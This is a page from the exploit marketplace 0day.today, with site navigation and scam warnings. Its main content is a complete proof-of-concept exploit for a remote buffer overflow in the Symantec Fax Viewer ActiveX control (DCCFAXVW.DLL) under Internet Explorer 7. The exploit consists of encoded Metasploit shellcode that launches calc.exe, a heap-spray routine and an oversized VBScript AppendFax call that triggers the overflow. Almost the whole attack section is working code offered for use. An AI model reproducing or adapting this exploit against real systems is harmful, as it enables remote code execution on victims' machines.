0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Symantec Fax Viewer Control 10 (DCCFAXVW.DLL) Remote BOF Exploit
[================================================================
Symantec Fax Viewer Control 10 (DCCFAXVW.DLL) Remote BOF Exploit
================================================================
<!--
Symantec Fax Viewer Control v10 (DCCFAXVW.DLL) remote buffer overflow exploit (IE7)
by Nine:Situations:Group::trotzkista
tested against: Symantec WinFax Pro 10.03
Internet Explorer 7, XP SP3
some details:
CLSID: {C05A1FBC-1413-11D1-B05F-00805F4945F6}
Progid: Symantec.FaxViewerControl.1
Binary Path: C:\Programmi\WinFax\DCCFAXVW.DLL
KillBitted: False
Implements IObjectSafety: False
Safe For Initialization (Registry): True
Safe For Scripting (Registry): True
-->
<html>
<object classid='clsid:C05A1FBC-1413-11D1-B05F-00805F4945F6' id='obj' />
</object>
<script language='javascript'>
// win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com
var scode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +
"%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" +
"%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" +
"%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" +
"%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +
"%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" +
"%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" +
"%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" +
"%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" +
"%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955" +
"%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b" +
"%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b" +
"%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44" +
"%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35" +
"%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530" +
"%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b" +
"%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c" +
"%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63" +
"%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f" +
"%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377" +
"%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f" +
"%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035" +
"%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653" +
"%u314e%u7475%u7038%u7765%u4370");
bigblock = unescape("%u0c0c%u0c0c");
headersize = 20;
slackspace = headersize+scode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<444;i++){memory[i] = block+scode}
</script>
<script language="vbscript">
obj.AppendFax string(1111,unescape("%0c"))
</script>
# 0day.today [2024-11-15] #